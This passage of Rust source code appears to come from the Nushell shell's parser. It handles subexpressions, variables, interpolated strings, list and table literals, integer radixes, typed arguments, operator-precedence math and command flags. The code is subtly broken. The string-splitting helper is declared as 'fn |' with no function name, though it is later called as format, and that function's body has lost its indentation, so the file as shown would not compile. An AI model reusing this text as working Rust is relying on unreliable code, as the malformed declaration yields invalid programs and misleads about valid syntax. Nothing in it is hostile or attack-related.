/// delimiters) into a classified block, keeping only the first error hit.
fn parse_subexpression(
    lite_arg: &Spanned<String>,
    scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
    // Strip the single leading and trailing delimiter characters.
    let inner: String = lite_arg
        .item
        .chars()
        .skip(1)
        .take(lite_arg.item.chars().count() - 2)
        .collect();

    // Lex the inner text; offsets are shifted by one to account for the
    // stripped opening delimiter.
    let (tokens, mut first_error) =
        lex(&inner, lite_arg.span.start() + 1, NewlineMode::Whitespace);

    let (lite_block, block_err) = parse_block(tokens);
    if first_error.is_none() {
        first_error = block_err;
    }

    scope.enter_scope();
    let (classified_block, classify_err) = classify_block(&lite_block, scope);
    scope.exit_scope();
    if first_error.is_none() {
        first_error = classify_err;
    }

    (
        SpannedExpression::new(Expression::Subexpression(classified_block), lite_arg.span),
        first_error,
    )
}
/// Turn a `$...` token into an expression: `$it` gets full column-path
/// handling, anything else becomes a plain variable reference.
fn parse_variable(
    lite_arg: &Spanned<String>,
    scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
    if lite_arg.item != "$it" {
        let var_expr = Expression::variable(lite_arg.item.clone(), lite_arg.span);
        return (SpannedExpression::new(var_expr, lite_arg.span), None);
    }
    trace!("parsing $it");
    parse_full_column_path(lite_arg, scope)
}
/// Parses the given lite_arg starting with dollar returning
/// a expression starting with $
/// Currently either Variable, String interpolation, FullColumnPath
fn parse_dollar_expr(
    lite_arg: &Spanned<String>,
    scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
    trace!("Parsing dollar expression: {:?}", lite_arg.item);
    // An interpolated string is at minimum `$""` / `$''` (3 chars). The
    // length check must be `> 2`: for the 2-char token `$"` the single quote
    // satisfies both starts_with and ends_with, and letting it through would
    // make parse_interpolated_string compute `string_len - 3` on a length-2
    // string (underflow / panic in debug builds).
    if (lite_arg.item.starts_with("$\"") && lite_arg.item.len() > 2 && lite_arg.item.ends_with('"'))
        || (lite_arg.item.starts_with("$'")
            && lite_arg.item.len() > 2
            && lite_arg.item.ends_with('\''))
    {
        // This is an interpolated string
        parse_interpolated_string(lite_arg, scope)
    } else if let (expr, None) = parse_range(lite_arg, scope) {
        (expr, None)
    } else if let (expr, None) = parse_full_column_path(lite_arg, scope) {
        (expr, None)
    } else {
        parse_variable(lite_arg, scope)
    }
}
/// A piece of an interpolated string: either literal text or the source of a
/// parenthesized sub-expression to be evaluated and spliced in.
#[derive(Debug)]
enum FormatCommand {
    // Literal text, passed through unchanged.
    Text(Spanned<String>),
    // The raw source inside a `(...)` group, parsed later as a pipeline.
    Column(Spanned<String>),
}
fn | (input: &str, start: usize) -> (Vec<FormatCommand>, Option<ParseError>) {
let original_start = start;
let mut output = vec![];
let mut error = None;
let mut loop_input = input.chars().peekable();
let mut start = start;
let mut end = start;
loop {
let mut before = String::new();
loop {
end += 1;
if let Some(c) = loop_input.next() {
if c == '(' {
break;
}
before.push(c);
} else {
break;
}
}
if !before.is_empty() {
output.push(FormatCommand::Text(
before.to_string().spanned(Span::new(start, end - 1)),
));
}
// Look for column as we're now at one
let mut column = String::new();
start = end;
let mut found_end = false;
let mut delimiter_stack = vec![')'];
for c in &mut loop_input {
end += 1;
if let Some('\'') = delimiter_stack.last() {
if c == '\'' {
delimiter_stack.pop();
}
} else if let Some('"') = delimiter_stack.last() {
if c == '"' {
delimiter_stack.pop();
}
} else if c == '\'' {
delimiter_stack.push('\'');
} else if c == '"' {
delimiter_stack.push('"');
} else if c == '(' {
delimiter_stack.push(')');
} else if c == ')' {
if let Some(')') = delimiter_stack.last() {
delimiter_stack.pop();
}
if delimiter_stack.is_empty() {
found_end = true;
break;
}
}
column.push(c);
}
if !column.is_empty() {
output.push(FormatCommand::Column(
column.to_string().spanned(Span::new(start, end)),
));
}
if column.is_empty() {
break;
}
if !found_end {
error = Some(ParseError::argument_error(
input.spanned(Span::new(original_start, end)),
ArgumentError::MissingValueForName("unclosed ()".to_string()),
));
}
start = end;
}
(output, error)
}
/// Parses an interpolated string, one that has expressions inside of it
///
/// The contents are split into literal and `(...)` pieces, each piece
/// becomes an expression, and the whole thing is rewritten as a call to
/// `build-string` wrapped in a subexpression.
fn parse_interpolated_string(
    lite_arg: &Spanned<String>,
    scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
    trace!("Parse_interpolated_string");
    let string_len = lite_arg.item.chars().count();
    // Strip the `$"`/`$'` prefix and the closing quote. saturating_sub guards
    // against a caller handing us fewer than 3 chars, which would otherwise
    // underflow (panic in debug builds).
    let inner_string = lite_arg
        .item
        .chars()
        .skip(2)
        .take(string_len.saturating_sub(3))
        .collect::<String>();
    let mut error = None;

    let (format_result, err) = format(&inner_string, lite_arg.span.start() + 2);

    if error.is_none() {
        error = err;
    }

    let mut output = vec![];

    for f in format_result {
        match f {
            FormatCommand::Text(t) => {
                output.push(SpannedExpression {
                    expr: Expression::Literal(hir::Literal::String(t.item)),
                    span: t.span,
                });
            }
            FormatCommand::Column(c) => {
                // Each `(...)` piece is parsed as a full pipeline of its own;
                // the first parse error aborts the whole interpolation.
                let result = parse(&c, c.span.start(), scope);
                match result {
                    (classified_block, None) => {
                        output.push(SpannedExpression {
                            expr: Expression::Subexpression(classified_block),
                            span: c.span,
                        });
                    }
                    (_, Some(err)) => {
                        return (garbage(c.span), Some(err));
                    }
                }
            }
        }
    }

    // Synthesize `build-string <pieces...>` as a single-pipeline block.
    let pipelines = vec![Pipeline {
        span: lite_arg.span,
        list: vec![ClassifiedCommand::Internal(InternalCommand {
            name: "build-string".to_owned(),
            name_span: lite_arg.span,
            args: hir::Call {
                head: Box::new(SpannedExpression {
                    expr: Expression::Synthetic(hir::Synthetic::String("build-string".to_owned())),
                    span: lite_arg.span,
                }),
                external_redirection: ExternalRedirection::Stdout,
                named: None,
                positional: Some(output),
                span: lite_arg.span,
            },
        })],
    }];

    let group = Group::new(pipelines, lite_arg.span);

    let call = SpannedExpression {
        expr: Expression::Subexpression(Arc::new(Block::new(
            Signature::new("<subexpression>"),
            vec![group],
            IndexMap::new(),
            lite_arg.span,
        ))),
        span: lite_arg.span,
    };

    (call, error)
}
/// Parse a single argument destined for an external command: `$...` and
/// `(...)` forms get real parsing, everything else is passed through as a
/// bare string.
fn parse_external_arg(
    lite_arg: &Spanned<String>,
    scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
    match lite_arg.item.chars().next() {
        Some('$') => parse_dollar_expr(lite_arg, scope),
        Some('(') => parse_full_column_path(lite_arg, scope),
        _ => (
            SpannedExpression::new(Expression::string(lite_arg.item.clone()), lite_arg.span),
            None,
        ),
    }
}
/// Parse the elements of a literal list. Only the first group of the block
/// is considered; a trailing comma on any element is stripped before the
/// element is parsed as `SyntaxShape::Any`.
fn parse_list(
    lite_block: &LiteBlock,
    scope: &dyn ParserScope,
) -> (Vec<SpannedExpression>, Option<ParseError>) {
    if lite_block.block.is_empty() {
        return (vec![], None);
    }

    let mut first_error = None;
    let mut items = vec![];

    for pipeline in &lite_block.block[0].pipelines {
        for command in &pipeline.commands {
            for part in &command.parts {
                // Drop a trailing comma, shrinking the span to match.
                let cleaned = if part.ends_with(',') {
                    let mut trimmed: String = part.item.clone();
                    trimmed.pop();
                    trimmed.spanned(Span::new(part.span.start(), part.span.end() - 1))
                } else {
                    part.clone()
                };
                let (expr, err) = parse_arg(SyntaxShape::Any, scope, &cleaned);
                items.push(expr);
                if first_error.is_none() {
                    first_error = err;
                }
            }
        }
    }

    (items, first_error)
}
/// Parse a literal table: the block's first pipeline holds the header row
/// (`[a b]`) and the second holds the data rows, each itself a `[...]`.
///
/// NOTE(review): this indexes `block[0]`, `pipelines[0]`/`[1]`, `commands[0]`
/// without checking — it assumes the caller (the Table arm of parse_arg) has
/// already verified the block has exactly two pipelines. Confirm before
/// calling from anywhere else.
fn parse_table(
    lite_block: &LiteBlock,
    scope: &dyn ParserScope,
    span: Span,
) -> (SpannedExpression, Option<ParseError>) {
    let mut error = None;
    let mut output = vec![];

    // Header
    let lite_group = &lite_block.block[0];
    let lite_pipeline = &lite_group.pipelines[0];
    let lite_inner = &lite_pipeline.commands[0];

    // The header token must be bracketed; strip `[` and `]`.
    let (string, err) = verify_and_strip(&lite_inner.parts[0], '[', ']');
    if error.is_none() {
        error = err;
    }

    let (tokens, err) = lex(
        &string,
        lite_inner.parts[0].span.start() + 1,
        NewlineMode::Whitespace,
    );
    if err.is_some() {
        return (garbage(lite_inner.span()), err);
    }

    let (lite_header, err) = parse_block(tokens);
    if err.is_some() {
        return (garbage(lite_inner.span()), err);
    }

    let (headers, err) = parse_list(&lite_header, scope);
    if error.is_none() {
        error = err;
    }

    // Cells
    let lite_rows = &lite_group.pipelines[1];
    let lite_cells = &lite_rows.commands[0];

    // Each part is one row: strip its brackets, lex, parse as a list.
    for arg in &lite_cells.parts {
        let (string, err) = verify_and_strip(arg, '[', ']');
        if error.is_none() {
            error = err;
        }
        let (tokens, err) = lex(&string, arg.span.start() + 1, NewlineMode::Whitespace);
        if err.is_some() {
            return (garbage(arg.span), err);
        }
        let (lite_cell, err) = parse_block(tokens);
        if err.is_some() {
            return (garbage(arg.span), err);
        }
        let (inner_cell, err) = parse_list(&lite_cell, scope);
        if error.is_none() {
            error = err;
        }
        output.push(inner_cell);
    }

    (
        SpannedExpression::new(Expression::Table(headers, output), span),
        error,
    )
}
/// Parse an integer literal, accepting hex (`0x`), binary (`0b`), octal
/// (`0o`) and plain decimal forms. Anything that fails to parse in its
/// detected radix is reported as an "int" mismatch.
fn parse_int(lite_arg: &Spanned<String>) -> (SpannedExpression, Option<ParseError>) {
    // Pick the radix from a two-byte prefix; `get` returns None when the
    // string is too short (or the cut is mid-codepoint), which means plain
    // decimal — exactly the cases the prefix checks would reject.
    let radix = match lite_arg.item.get(0..2) {
        Some("0x") => Some(16),
        Some("0b") => Some(2),
        Some("0o") => Some(8),
        _ => None,
    };

    let parsed = match radix {
        Some(r) => i64::from_str_radix(&lite_arg.item[2..], r).ok(),
        None => lite_arg.item.parse::<i64>().ok(),
    };

    match parsed {
        Some(v) => (
            SpannedExpression::new(Expression::integer(v), lite_arg.span),
            None,
        ),
        None => (
            garbage(lite_arg.span),
            Some(ParseError::mismatch("int", lite_arg.clone())),
        ),
    }
}
/// Parses the given argument using the shape as a guide for how to correctly parse the argument
fn parse_arg(
    expected_type: SyntaxShape,
    scope: &dyn ParserScope,
    lite_arg: &Spanned<String>,
) -> (SpannedExpression, Option<ParseError>) {
    // Dollar expressions (variables, interpolation, paths) win over any shape.
    if lite_arg.item.starts_with('$') {
        return parse_dollar_expr(lite_arg, scope);
    }

    // before anything else, try to see if this is a number in paranthesis
    if lite_arg.item.starts_with('(') {
        return parse_full_column_path(lite_arg, scope);
    }

    match expected_type {
        // Number: try i64 (with radix prefixes), then big integer, then decimal.
        SyntaxShape::Number => {
            if let (x, None) = parse_int(lite_arg) {
                (x, None)
            } else if let Ok(x) = lite_arg.item.parse::<BigInt>() {
                (
                    SpannedExpression::new(Expression::big_integer(x), lite_arg.span),
                    None,
                )
            } else if let Ok(x) = lite_arg.item.parse::<BigDecimal>() {
                (
                    SpannedExpression::new(Expression::decimal(x), lite_arg.span),
                    None,
                )
            } else {
                (
                    garbage(lite_arg.span),
                    Some(ParseError::mismatch("number", lite_arg.clone())),
                )
            }
        }
        // Int: note this does NOT go through parse_int, so radix prefixes
        // (0x/0b/0o) are not accepted here — only plain decimal / big int.
        SyntaxShape::Int => {
            if let Ok(x) = lite_arg.item.parse::<i64>() {
                (
                    SpannedExpression::new(Expression::integer(x), lite_arg.span),
                    None,
                )
            } else if let Ok(x) = lite_arg.item.parse::<BigInt>() {
                (
                    SpannedExpression::new(Expression::big_integer(x), lite_arg.span),
                    None,
                )
            } else {
                (
                    garbage(lite_arg.span),
                    Some(ParseError::mismatch("int", lite_arg.clone())),
                )
            }
        }
        // String: strip surrounding quotes; never fails.
        SyntaxShape::String => {
            let trimmed = trim_quotes(&lite_arg.item);
            (
                SpannedExpression::new(Expression::string(trimmed), lite_arg.span),
                None,
            )
        }
        // Glob: strip quotes and expand `~`/env-style paths.
        SyntaxShape::GlobPattern => {
            let trimmed = trim_quotes(&lite_arg.item);
            let expanded = expand_path(trimmed).to_string_lossy().to_string();
            (
                SpannedExpression::new(Expression::glob_pattern(expanded), lite_arg.span),
                None,
            )
        }

        SyntaxShape::Range => parse_range(lite_arg, scope),
        // Operators are only valid in math expressions, parsed elsewhere.
        SyntaxShape::Operator => (
            garbage(lite_arg.span),
            Some(ParseError::mismatch("operator", lite_arg.clone())),
        ),
        SyntaxShape::Filesize => parse_filesize(lite_arg),
        SyntaxShape::Duration => parse_duration(lite_arg),
        SyntaxShape::FilePath => {
            let trimmed = trim_quotes(&lite_arg.item);
            let path = PathBuf::from(trimmed);
            let expanded = expand_path(path);
            (
                SpannedExpression::new(Expression::FilePath(expanded), lite_arg.span),
                None,
            )
        }
        SyntaxShape::ColumnPath => parse_simple_column_path(lite_arg),
        SyntaxShape::FullColumnPath => parse_full_column_path(lite_arg, scope),
        // Any: try each concrete shape in priority order; first success wins.
        // Order matters: Int before Number before Range, with String last as
        // the catch-all (it never fails).
        SyntaxShape::Any => {
            let shapes = vec![
                SyntaxShape::Int,
                SyntaxShape::Number,
                SyntaxShape::Range,
                SyntaxShape::Filesize,
                SyntaxShape::Duration,
                SyntaxShape::Block,
                SyntaxShape::Table,
                SyntaxShape::String,
            ];
            for shape in shapes.iter() {
                if let (s, None) = parse_arg(*shape, scope, lite_arg) {
                    return (s, None);
                }
            }
            (
                garbage(lite_arg.span),
                Some(ParseError::mismatch("any shape", lite_arg.clone())),
            )
        }
        // Table: a `[...]` literal. One pipeline inside = list, two = table
        // (header row + data rows), anything else is an error.
        SyntaxShape::Table => {
            let mut chars = lite_arg.item.chars();

            match (chars.next(), chars.next_back()) {
                (Some('['), Some(']')) => {
                    // We have a literal row
                    let string: String = chars.collect();

                    // We haven't done much with the inner string, so let's go ahead and work with it
                    let (tokens, err) =
                        lex(&string, lite_arg.span.start() + 1, NewlineMode::Whitespace);
                    if err.is_some() {
                        return (garbage(lite_arg.span), err);
                    }

                    let (lite_block, err) = parse_block(tokens);
                    if err.is_some() {
                        return (garbage(lite_arg.span), err);
                    }

                    let lite_groups = &lite_block.block;

                    if lite_groups.is_empty() {
                        return (
                            SpannedExpression::new(Expression::List(vec![]), lite_arg.span),
                            None,
                        );
                    }
                    if lite_groups[0].pipelines.len() == 1 {
                        let (items, err) = parse_list(&lite_block, scope);
                        (
                            SpannedExpression::new(Expression::List(items), lite_arg.span),
                            err,
                        )
                    } else if lite_groups[0].pipelines.len() == 2 {
                        parse_table(&lite_block, scope, lite_arg.span)
                    } else {
                        (
                            garbage(lite_arg.span),
                            Some(ParseError::mismatch(
                                "list or table",
                                "unknown".to_string().spanned(lite_arg.span),
                            )),
                        )
                    }
                }
                _ => (
                    garbage(lite_arg.span),
                    Some(ParseError::mismatch("table", lite_arg.clone())),
                ),
            }
        }
        SyntaxShape::MathExpression => parse_arg(SyntaxShape::Any, scope, lite_arg),

        SyntaxShape::Block | SyntaxShape::RowCondition => {
            // Blocks have one of two forms: the literal block and the implied block
            // To parse a literal block, we need to detect that what we have is itself a block
            let mut chars: Vec<_> = lite_arg.item.chars().collect();

            match chars.first() {
                Some('{') => {
                    let mut error = None;

                    // Strip the braces; a missing `}` is recorded but parsing
                    // continues so the user still gets a block back.
                    if let Some('}') = chars.last() {
                        chars = chars[1..(chars.len() - 1)].to_vec();
                    } else {
                        chars = chars[1..].to_vec();
                        error = Some(ParseError::unclosed(
                            "}".into(),
                            Span::new(lite_arg.span.end(), lite_arg.span.end()),
                        ));
                    }
                    // We have a literal block
                    let string: String = chars.into_iter().collect();

                    // We haven't done much with the inner string, so let's go ahead and work with it
                    let (mut tokens, err) =
                        lex(&string, lite_arg.span.start() + 1, NewlineMode::Normal);
                    if error.is_none() {
                        error = err;
                    }

                    // Check to see if we have parameters
                    // A leading `|` token starts a `|a, b|` parameter list.
                    let params = if matches!(
                        tokens.first(),
                        Some(Token {
                            contents: TokenContents::Pipe,
                            ..
                        })
                    ) {
                        // We've found a parameter list
                        let mut param_tokens = vec![];
                        let mut token_iter = tokens.into_iter().skip(1);
                        // Collect everything up to the closing `|`.
                        for token in &mut token_iter {
                            if matches!(
                                token,
                                Token {
                                    contents: TokenContents::Pipe,
                                    ..
                                }
                            ) {
                                break;
                            } else {
                                param_tokens.push(token);
                            }
                        }
                        let split_tokens =
                            lex_split_baseline_tokens_on(param_tokens, &[',', ':', '?']);

                        let mut i = 0;
                        let mut params = vec![];

                        while i < split_tokens.len() {
                            let (parameter, advance_by, error) =
                                parse_parameter(&split_tokens[i..], split_tokens[i].span);

                            if error.is_some() {
                                return (garbage(lite_arg.span), error);
                            }

                            i += advance_by;
                            params.push(parameter);
                        }

                        // The remaining tokens form the block body; a
                        // parameter list with no body is an error.
                        tokens = token_iter.collect();
                        if tokens.is_empty() {
                            return (
                                garbage(lite_arg.span),
                                Some(ParseError::mismatch(
                                    "block with parameters",
                                    lite_arg.clone(),
                                )),
                            );
                        }
                        params
                    } else {
                        vec![]
                    };

                    let (lite_block, err) = parse_block(tokens);
                    if error.is_none() {
                        error = err;
                    }

                    scope.enter_scope();
                    let (mut classified_block, err) = classify_block(&lite_block, scope);
                    if error.is_none() {
                        error = err;
                    }
                    scope.exit_scope();

                    // Patch the block's span and install the explicit
                    // parameter list (replacing any inferred positionals).
                    if let Some(classified_block) = Arc::get_mut(&mut classified_block) {
                        classified_block.span = lite_arg.span;
                        if !params.is_empty() {
                            classified_block.params.positional.clear();

                            for param in params {
                                classified_block
                                    .params
                                    .positional
                                    .push((param.pos_type, param.desc.unwrap_or_default()));
                            }
                        }
                    }

                    (
                        SpannedExpression::new(Expression::Block(classified_block), lite_arg.span),
                        error,
                    )
                }
                _ => {
                    // We have an implied block, but we can't parse this here
                    // it needed to have been parsed up higher where we have control over more than one arg
                    (
                        garbage(lite_arg.span),
                        Some(ParseError::mismatch("block", lite_arg.clone())),
                    )
                }
            }
        }
    }
}
/// This is a bit of a "fix-up" of previously parsed areas. In cases where we're in shorthand mode (eg in the `where` command), we need
/// to use the original source to parse a column path. Without it, we'll lose a little too much information to parse it correctly. As we'll
/// only know we were on the left-hand side of an expression after we do the full math parse, we need to do this step after rather than during
/// the initial parse.
fn shorthand_reparse(
    left: SpannedExpression,
    orig_left: Option<Spanned<String>>,
    scope: &dyn ParserScope,
    shorthand_mode: bool,
) -> (SpannedExpression, Option<ParseError>) {
    // Only reparse when shorthand mode is on AND the original token survived.
    match (shorthand_mode, orig_left) {
        (true, Some(original)) => parse_arg(SyntaxShape::FullColumnPath, scope, &original),
        _ => (left, None),
    }
}
/// Parse an argument as `Any`, returning the original token alongside the
/// parsed expression so the caller can later reparse it (shorthand mode).
fn parse_possibly_parenthesized(
    lite_arg: &Spanned<String>,
    scope: &dyn ParserScope,
) -> (
    (Option<Spanned<String>>, SpannedExpression),
    Option<ParseError>,
) {
    let (expr, err) = parse_arg(SyntaxShape::Any, scope, lite_arg);
    let original_token = Some(lite_arg.clone());
    ((original_token, expr), err)
}
/// Handle parsing math expressions, complete with working with the precedence of the operators
///
/// Implementation: an operator-precedence (shunting-yard style) parse over
/// two parallel stacks — `working_exprs` holds operands/operators (each
/// paired with the original token so the LHS can be reparsed in shorthand
/// mode), and `prec` holds the precedence of each pushed operator. Returns
/// the index one past the last consumed arg, the resulting expression, and
/// the first error encountered.
pub fn parse_math_expression(
    incoming_idx: usize,
    lite_args: &[Spanned<String>],
    scope: &dyn ParserScope,
    shorthand_mode: bool,
) -> (usize, SpannedExpression, Option<ParseError>) {
    // Precedence parsing is included
    // shorthand_mode means that the left-hand side of an expression can point to a column-path.
    // To make this possible, we parse as normal, but then go back and when we detect a
    // left-hand side, reparse that value if it's a string
    let mut idx = 0;
    let mut error = None;

    let mut working_exprs = vec![];
    let mut prec = vec![];

    // Seed the stack with the first operand.
    let (lhs_working_expr, err) = parse_possibly_parenthesized(&lite_args[idx], scope);

    if error.is_none() {
        error = err;
    }
    working_exprs.push(lhs_working_expr);

    idx += 1;

    prec.push(0);

    while idx < lite_args.len() {
        let (op, err) = parse_operator(&lite_args[idx]);
        if error.is_none() {
            error = err;
        }
        idx += 1;

        // Operator with no right-hand side: record the error and pad the
        // stack with garbage so the reduction loop below stays balanced.
        if idx == lite_args.len() {
            if error.is_none() {
                error = Some(ParseError::argument_error(
                    lite_args[idx - 1].clone(),
                    ArgumentError::MissingMandatoryPositional("right hand side".into()),
                ));
            }
            working_exprs.push((None, garbage(op.span)));
            working_exprs.push((None, garbage(op.span)));
            prec.push(0);
            break;
        }

        trace!(
            "idx: {} working_exprs: {:#?} prec: {:?}",
            idx,
            working_exprs,
            prec
        );

        let (rhs_working_expr, err) = parse_possibly_parenthesized(&lite_args[idx], scope);

        if error.is_none() {
            error = err;
        }

        let next_prec = op.precedence();

        // Higher precedence than the stack top: shift (push and keep going).
        if !prec.is_empty() && next_prec > *prec.last().expect("this shouldn't happen") {
            prec.push(next_prec);
            working_exprs.push((None, op));
            working_exprs.push(rhs_working_expr);
            idx += 1;
            continue;
        }

        // Otherwise reduce: pop (lhs, op, rhs) triples while the stacked
        // operator binds at least as tightly as the incoming one.
        while !prec.is_empty()
            && *prec.last().expect("This shouldn't happen") >= next_prec
            && next_prec > 0 // Not garbage
            && working_exprs.len() >= 3
        {
            // Pop 3 and create and expression, push and repeat
            trace!(
                "idx: {} working_exprs: {:#?} prec: {:?}",
                idx,
                working_exprs,
                prec
            );
            let (_, right) = working_exprs.pop().expect("This shouldn't be possible");
            let (_, op) = working_exprs.pop().expect("This shouldn't be possible");
            let (orig_left, left) = working_exprs.pop().expect("This shouldn't be possible");

            // If we're in shorthand mode, we need to reparse the left-hand side if possible
            let (left, err) = shorthand_reparse(left, orig_left, scope, shorthand_mode);
            if error.is_none() {
                error = err;
            }

            let span = Span::new(left.span.start(), right.span.end());
            working_exprs.push((
                None,
                SpannedExpression {
                    expr: Expression::Binary(Box::new(Binary { left, op, right })),
                    span,
                },
            ));
            prec.pop();
        }

        // Now shift the incoming operator and operand.
        working_exprs.push((None, op));
        working_exprs.push(rhs_working_expr);
        prec.push(next_prec);

        idx += 1;
    }

    // Drain whatever is left on the stack into a single expression.
    while working_exprs.len() >= 3 {
        // Pop 3 and create and expression, push and repeat
        let (_, right) = working_exprs.pop().expect("This shouldn't be possible");
        let (_, op) = working_exprs.pop().expect("This shouldn't be possible");
        let (orig_left, left) = working_exprs.pop().expect("This shouldn't be possible");

        let (left, err) = shorthand_reparse(left, orig_left, scope, shorthand_mode);
        if error.is_none() {
            error = err;
        }

        let span = Span::new(left.span.start(), right.span.end());
        working_exprs.push((
            None,
            SpannedExpression {
                expr: Expression::Binary(Box::new(Binary { left, op, right })),
                span,
            },
        ));
    }

    let (orig_left, left) = working_exprs.pop().expect("This shouldn't be possible");
    let (left, err) = shorthand_reparse(left, orig_left, scope, shorthand_mode);
    if error.is_none() {
        error = err;
    }

    (incoming_idx + idx, left, error)
}
/// Handles parsing the positional arguments as a batch
/// This allows us to check for times where multiple arguments are treated as one shape, as is the case with SyntaxShape::Math
///
/// Returns the (possibly advanced) index of the last consumed part, the
/// parsed expression, and the first error encountered.
fn parse_positional_argument(
    idx: usize,
    lite_cmd: &LiteCommand,
    positional_type: &PositionalType,
    remaining_positionals: usize,
    scope: &dyn ParserScope,
) -> (usize, SpannedExpression, Option<ParseError>) {
    let mut idx = idx;
    let mut error = None;
    let arg = match positional_type {
        // A math expression may span several parts; consume as many as we
        // can while leaving enough parts for the remaining positionals.
        PositionalType::Mandatory(_, SyntaxShape::MathExpression)
        | PositionalType::Optional(_, SyntaxShape::MathExpression) => {
            let end_idx = if (lite_cmd.parts.len() - 1) > remaining_positionals {
                lite_cmd.parts.len() - remaining_positionals
            } else {
                lite_cmd.parts.len()
            };

            let (new_idx, arg, err) =
                parse_math_expression(idx, &lite_cmd.parts[idx..end_idx], scope, false);

            let span = arg.span;
            let mut commands = hir::Pipeline::new(span);
            commands.push(ClassifiedCommand::Expr(Box::new(arg)));

            // Wrap the expression in a block so it's evaluated lazily.
            let block = hir::Block::new(
                Signature::new("<initializer>"),
                vec![Group::new(vec![commands], lite_cmd.span())],
                IndexMap::new(),
                span,
            );

            let arg = SpannedExpression::new(Expression::Block(Arc::new(block)), span);

            // new_idx points past the expression; the caller's loop will
            // increment, so step back one.
            idx = new_idx - 1;
            if error.is_none() {
                error = err;
            }

            arg
        }
        PositionalType::Mandatory(_, SyntaxShape::RowCondition)
        | PositionalType::Optional(_, SyntaxShape::RowCondition) => {
            // A condition can take up multiple arguments, as we build the operation as <arg> <operator> <arg>
            // We need to do this here because in parse_arg, we have access to only one arg at a time

            if idx < lite_cmd.parts.len() {
                if lite_cmd.parts[idx].item.starts_with('{') {
                    // It's an explicit math expression, so parse it deeper in
                    let (arg, err) =
                        parse_arg(SyntaxShape::RowCondition, scope, &lite_cmd.parts[idx]);
                    if error.is_none() {
                        error = err;
                    }
                    arg
                } else {
                    // Shorthand condition (e.g. `where size > 10`): parse the
                    // remaining parts as one math expression in shorthand mode.
                    let end_idx = if (lite_cmd.parts.len() - 1) > remaining_positionals {
                        lite_cmd.parts.len() - remaining_positionals
                    } else {
                        lite_cmd.parts.len()
                    };

                    let (new_idx, arg, err) =
                        parse_math_expression(idx, &lite_cmd.parts[idx..end_idx], scope, true);

                    let span = arg.span;
                    let mut commands = hir::Pipeline::new(span);
                    commands.push(ClassifiedCommand::Expr(Box::new(arg)));

                    let mut block = hir::Block::new(
                        Signature::new("<cond>"),
                        vec![Group::new(vec![commands], lite_cmd.span())],
                        IndexMap::new(),
                        span,
                    );

                    block.infer_params();

                    let arg = SpannedExpression::new(Expression::Block(Arc::new(block)), span);

                    idx = new_idx - 1;
                    if error.is_none() {
                        error = err;
                    }

                    arg
                }
            } else {
                // Ran out of parts: the condition is missing entirely.
                if error.is_none() {
                    error = Some(ParseError::argument_error(
                        lite_cmd.parts[0].clone(),
                        ArgumentError::MissingMandatoryPositional("condition".into()),
                    ))
                }
                garbage(lite_cmd.span())
            }
        }
        // Every other shape consumes exactly one part.
        PositionalType::Mandatory(_, shape) | PositionalType::Optional(_, shape) => {
            let (arg, err) = parse_arg(*shape, scope, &lite_cmd.parts[idx]);
            if error.is_none() {
                error = err;
            }
            arg
        }
    };

    (idx, arg, error)
}
/// Does a full parse of an internal command using the lite-ly parse command as a starting point
/// This main focus at this level is to understand what flags were passed in, what positional arguments were passed in, what rest arguments were passed in
/// and to ensure that the basic requirements in terms of number of each were met.
fn parse_internal_command(
    lite_cmd: &LiteCommand,
    scope: &dyn ParserScope,
    signature: &Signature,
    mut idx: usize,
) -> (InternalCommand, Option<ParseError>) {
    // This is a known internal command, so we need to work with the arguments and parse them according to the expected types

    // Parts 0..=idx form the (possibly multi-word, e.g. subcommand) name.
    let (name, name_span) = (
        lite_cmd.parts[0..(idx + 1)]
            .iter()
            .map(|x| x.item.clone())
            .collect::<Vec<String>>()
            .join(" "),
        Span::new(
            lite_cmd.parts[0].span.start(),
            lite_cmd.parts[idx].span.end(),
        ),
    );

    let mut internal_command = InternalCommand::new(name, name_span, lite_cmd.span());
    internal_command.args.set_initial_flags(signature);

    let mut current_positional = 0;
    let mut named = NamedArguments::new();
    let mut positional = vec![];
    let mut error = None;
    idx += 1; // Start where the arguments begin

    while idx < lite_cmd.parts.len() {
        // Anything starting with '-' (and longer than just "-") is a flag.
        if lite_cmd.parts[idx].item.starts_with('-') && lite_cmd.parts[idx].item.len() > 1 {
            let (named_types, err) = super::flag::get_flag_signature_spec(
                signature,
                &internal_command,
                &lite_cmd.parts[idx],
            );

            if err.is_none() {
                for (full_name, named_type) in &named_types {
                    match named_type {
                        NamedType::Mandatory(_, shape) | NamedType::Optional(_, shape) => {
                            // `--flag=value` form: split on '=' in place.
                            if lite_cmd.parts[idx].item.contains('=') {
                                let mut offset = 0;

                                let value = lite_cmd.parts[idx]
                                    .item
                                    .chars()
                                    .skip_while(|prop| {
                                        offset += 1;
                                        *prop != '='
                                    })
                                    .nth(1);

                                // If nothing follows '=', back offset up so the
                                // value span is empty rather than out of range.
                                offset = if value.is_none() { offset - 1 } else { offset };

                                let flag_value = Span::new(
                                    lite_cmd.parts[idx].span.start() + offset,
                                    lite_cmd.parts[idx].span.end(),
                                );
                                let value = lite_cmd.parts[idx].item[offset..]
                                    .to_string()
                                    .spanned(flag_value);
                                let (arg, err) = parse_arg(*shape, scope, &value);
                                named.insert_mandatory(
                                    full_name.clone(),
                                    lite_cmd.parts[idx].span,
                                    arg,
                                );

                                if error.is_none() {
                                    error = err;
                                }
                            } else if idx == lite_cmd.parts.len() {
                                // Oops, we're missing the argument to our named argument
                                if error.is_none() {
                                    error = Some(ParseError::argument_error(
                                        lite_cmd.parts[0].clone(),
                                        ArgumentError::MissingValueForName(format!("{:?}", shape)),
                                    ));
                                }
                            } else {
                                // `--flag value` form: the next part is the value.
                                idx += 1;
                                if lite_cmd.parts.len() > idx {
                                    let (arg, err) = parse_arg(*shape, scope, &lite_cmd.parts[idx]);
                                    named.insert_mandatory(
                                        full_name.clone(),
                                        lite_cmd.parts[idx - 1].span,
                                        arg,
                                    );

                                    if error.is_none() {
                                        error = err;
                                    }
                                } else if error.is_none() {
                                    error = Some(ParseError::argument_error(
                                        lite_cmd.parts[0].clone(),
                                        ArgumentError::MissingValueForName(full_name.to_owned()),
                                    ));
                                }
                            }
                        }
                        NamedType::Switch(_) => {
                            named.insert_switch(
                                full_name.clone(),
                                Some(Flag::new(FlagKind::Longhand, lite_cmd.parts[idx].span)),
                            );
                        }
                    }
